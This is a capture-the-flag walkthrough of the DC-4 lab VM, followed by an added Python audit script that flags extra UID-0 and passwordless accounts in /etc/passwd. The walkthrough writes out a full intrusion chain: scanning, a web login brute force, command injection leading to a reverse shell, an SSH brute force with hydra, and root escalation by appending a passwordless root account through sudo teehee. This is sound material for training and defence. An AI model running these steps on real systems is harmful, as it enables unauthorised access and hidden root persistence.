DC-4 Target Machine Penetration Walkthrough

  1. Lab environment: Kali and DC-4 (both VMs must use the same network adapter mode; NAT mode is used here)
  2. Kali: 192.168.200.3, DC-4: 192.168.200.4
  • Run ifconfig to get Kali's IP, then use nmap to sweep the subnet and find DC-4's IP
┌──(root💀kali)-[/home/shiqi/桌面]
└─# nmap -sP 192.168.200.0/24           
  • Information gathering: ports 22 and 80 are open

    ┌──(root💀kali)-[/home/shiqi/桌面]
    └─# nmap -sV 192.168.200.4                                                  1 ⚙
    Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-19 15:18 CST
    Nmap scan report for 192.168.200.4
    Host is up (0.00021s latency).
    Not shown: 998 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
    80/tcp open  http    nginx 1.15.10
    MAC Address: 00:0C:29:D1:99:66 (VMware)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
  • Open the web port: browse to DC-4's IP address (the page's hint shows that the login username is admin)

  • Directory scan with dirb

    ┌──(root💀kali)-[/usr/share/wordlists]
    └─# dirb http://192.168.200.4
    START_TIME: Tue Apr 19 19:52:14 2022
    URL_BASE: http://192.168.200.4/
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

    GENERATED WORDS: 4612

    ---- Scanning URL: http://192.168.200.4/ ----
    ==> DIRECTORY: http://192.168.200.4/css/
    ==> DIRECTORY: http://192.168.200.4/images/
    + http://192.168.200.4/index.php (CODE:200|SIZE:506)
    ---- Entering directory: http://192.168.200.4/css/ ----

    ---- Entering directory: http://192.168.200.4/images/ ----

    -----------------
    END_TIME: Tue Apr 19 19:52:24 2022
    DOWNLOADED: 13836 - FOUND: 1
    ## Result: the admin login page is http://192.168.200.4/index.php
    
  • Brute-force the password (I used Burp Suite's brute-force method); screenshots of the steps are omitted

    ## The recovered password is happy
    After logging in there are only three options. Capturing the request with Burp and testing whether the submitted command can be replaced with a different one shows that it can.
    
  • Reverse shell

    ┌──(root💀kali)-[/etc/network/interfaces.d]
    └─# nc -lvp 7777
    listening on [any] 7777 ...
    192.168.200.4: inverse host lookup failed: Unknown host
    connect to [192.168.200.3] from (UNKNOWN) [192.168.200.4] 36838
    ls
    command.php
    css
    images
    whoami
    www-data
    cd /home
    ls
    charles
    jim
    sam
    ls -l

    ls -lh sam
    total 0
    ls -lh charles
    total 0
    ls -lh jim
    total 12K
    drwxr-xr-x 2 jim jim 4.0K Apr  7  2019 backups
    -rw------- 1 jim jim  528 Apr  6  2019 mbox
    -rwsrwxrwx 1 jim jim  174 Apr  6  2019 test.sh
    ## jim's home directory looks unusual
    ls
    backups  mbox  test.sh
    ## Entering jim's directory shows three files. The backups directory holds old-passwd.bak, which should be a password list; copy its contents into a new local text file. mbox cannot be accessed (permission denied).
    
    • Brute-force the SSH password with hydra; the recovered password is jibril04

      ┌──(root💀kali)-[/home/shiqi/桌面]
      └─# hydra -l jim -P passwd -T 64 ssh://192.168.200.4:22
      Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
      
      Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-19 21:30:04
      [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
      [DATA] max 16 tasks per 1 server, overall 16 tasks, 253 login tries (l:1/p:253), ~16 tries per task
      [DATA] attacking ssh://192.168.200.4:22/
      [STATUS] 178.00 tries/min, 178 tries in 00:01h, 77 to do in 00:01h, 16 active
      [22][ssh] host: 192.168.200.4   login: jim   password: jibril04
      
      • Log in as jim

        ┌──(root💀kali)-[/home/shiqi/桌面]
        └─# ssh jim@192.168.200.4
        jim@dc-4:~$ su root
        Password: 
        su: Authentication failure
        ## Trying to escalate with su root fails
        jim@dc-4:~$ ls
        backups  mbox  test.sh
        jim@dc-4:~$ cat mbox
        ## The file that could not be read in the previous step can now be read: it is a mail sent locally by the root user
        From root@dc-4 Sat Apr 06 20:20:04 2019
        Return-path: <root@dc-4>
        Envelope-to: jim@dc-4
        Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
        Received: from root by dc-4 with local (Exim 4.89)


        jim@dc-4:~$ cd /var/mail/
        jim@dc-4:/var/mail$ ls
        jim
        jim@dc-4:/var/mail$ cat jim
        Password is:  ^xHhA&hvim0y
        ## This gives the password of user charles: ^xHhA&hvim0y
        
        
        
        • Switch to the charles user

          jim@dc-4:/var/mail$ su charles
          Password: 
          charles@dc-4:/var/mail$ 
          ## Checking for escalation paths shows that charles can run teehee as root via sudo without a password
          charles@dc-4:/var/mail$ sudo -l
              (root) NOPASSWD: /usr/bin/teehee
          
          
          
          • Create an admin account and give it passwordless root login

            charles@dc-4:/var/mail$ echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
            admin::0:0:::/bin/bash
            charles@dc-4:/var/mail$ su admin
            root@dc-4:/var/mail# ls
            jim
            root@dc-4:/var/mail# whoami
            root
            ## Use find to locate the flag file
            root@dc-4:/etc# find / -name flag*
            /sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/eth0/flags
            /sys/devices/platform/serial8250/tty/ttyS2/flags
            /sys/devices/platform/serial8250/tty/ttyS0/flags
            /sys/devices/platform/serial8250/tty/ttyS3/flags
            /sys/devices/platform/serial8250/tty/ttyS1/flags
            /sys/devices/virtual/net/lo/flags
            /root/flag.txt
            root@dc-4:/etc# cd /root
            root@dc-4:/root# cat flag.txt
            ## Printing the flag means the box is done
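
From the defender's side, the persistence step above leaves a distinctive trace: a second UID-0 account with an empty password field in /etc/passwd. The following Python audit script is an added example, not part of the original write-up; it parses passwd-format lines and flags extra root-equivalent accounts, empty password fields, hashes stored outside /etc/shadow and malformed entries. The SAMPLE_PASSWD text is constructed, with its last line mirroring the entry appended with teehee above.

```python
"""Audit passwd-format text for root-equivalent or passwordless accounts."""
# Added example, not from the original write-up. SAMPLE_PASSWD is constructed;
# its last line mirrors the entry appended with teehee above.
from dataclasses import dataclass
from typing import List

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
jim:x:1001:1001:Jim,,,:/home/jim:/bin/bash
charles:x:1002:1002:Charles,,,:/home/charles:/bin/bash
admin::0:0:::/bin/bash
"""


@dataclass
class Finding:
    line_no: int
    user: str
    reason: str


def audit_passwd(text: str) -> List[Finding]:
    """Return one Finding per suspicious entry, in file order."""
    findings: List[Finding] = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(Finding(line_no, fields[0], "malformed entry (expected 7 fields)"))
            continue
        user, pw, uid, _gid, _gecos, _home, _shell = fields
        if pw == "":
            # Empty field: su/login accept the account with no password at all.
            findings.append(Finding(line_no, user, "empty password field"))
        elif pw not in ("x", "*", "!", "!!"):
            # Hashes belong in /etc/shadow; a hash here is world-readable.
            findings.append(Finding(line_no, user, "password hash stored in passwd"))
        if uid == "0" and user != "root":
            # A second UID-0 login is the signature of the appended backdoor.
            findings.append(Finding(line_no, user, "extra UID-0 account"))
    return findings


def audit_file(path: str = "/etc/passwd") -> List[Finding]:
    """Run the audit against a real passwd file on the host."""
    with open(path, encoding="utf-8") as fh:
        return audit_passwd(fh.read())
```

On the sample, audit_passwd reports line 5 twice (empty password field, extra UID-0 account); audit_file() runs the same check against a live host's /etc/passwd.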
            
            